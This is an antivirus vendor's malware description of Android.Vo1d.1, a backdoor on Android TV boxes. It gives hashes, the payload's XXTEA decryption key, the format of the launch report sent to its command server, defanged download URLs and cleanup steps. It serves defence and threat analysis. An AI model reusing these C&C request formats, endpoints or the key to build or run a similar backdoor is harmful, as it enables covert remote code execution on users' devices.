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Android.Vo1d.1

Added to the Dr.Web virus database: 2024-07-26

Virus description added:

SHA1 hashes:

  • f3732871371819532416cf2ec03ea103a3d61802 (/system/xbin/vo1d)
  • 675f9a34f6f8dc887e47aa85fffda41c178eb186 (decrypted payload)

Description

This is a component of the malicious backdoor Android.Vo1d, which was detected in the system storage area of a number of Android-based TV box models. Its functionality includes:

  • Decrypting the payload;
  • Sending a launch report to the C&C server;
  • Launching the Android.Vo1d.3 component;
  • Downloading and running binary files from target URLs.

Operating routine

Decrypting the payload

Android.Vo1d.1 extracts and decrypts the payload from itself, using the XXTEA algorithm with the key fPNH830ES23QOPIM*&S955(2WR@L*&GF. The resulting object is loaded into the RAM. In fact, this is the main body of Android.Vo1d.1 that performs malicious tasks.

Sending the launch report to the C&C server

Android.Vo1d.1 sends a POST request to hxxp[:]//bitemores[.]com/api/start:

POST hxxp[:]//bitemores[.]com/api/start
User-Agent curl/7.64.0
Accept */*
Content-Type application/json;charset=UTF-8

An example of a request:


{
    "c": "-1",
    "ct": "2024-07-22 19:15:15",
    "dt": "0",
    "g": "10",
    "gt": "0",
    "i": "31",
    "nn": "/data/local/tmp/vo1d",
    "pd": "10993",
    "t": "0",
    "u": "1",
    "ud": "0",
    "uid": "",
    "v": "10",
    "vc": "",
    "vt": ""
}

where:

  • c — has the value 0 if the component wd is present on the device, or the value -1 if this component cannot be found;
  • ct — the current time;
  • i — the Android API version;
  • u — the location of the component wd;
  • nn — the path to the Android.Vo1d.1 executable;
  • pd — a pid of the Android.Vo1d.1 process;
  • ud — the uid (user id) under which Android.Vo1d.1 is being launched;
  • g — a constant;
  • v — a constant;
  • u — indicates the location of the component wd (Android.Vo1d.3).

Known possible wd binary file locations:

  • /data/system/installd
  • /system/xbin/wd
  • /data/google/rild

Launching the Android.Vo1d.3 component

Android.Vo1d launches /system/xbin/wd (Android.Vo1d.3) and controls its process activity, restarting it if necessary.

Downloading and launching binary files from target URLs

To download executables, Android.Vo1d.1 sends GET requests to the following addresses:

  • http[:]//6f33933ce4a5c0e1b32fea736a61351a[.]com/v1.0.0/sv
  • http[:]//catmos99[.]com:81/v1.0.0/sv

The format of these requests:

GET HTTP/1.1 hxxp[:]//bitemores[.]com/api/start
User-Agent curl/7.64.0
Accept */*

From these addresses, the trojan receives URLs from which it downloads and then runs target files.

Indicators of compromise

More details on Android.Vo1d.3

News article about the trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

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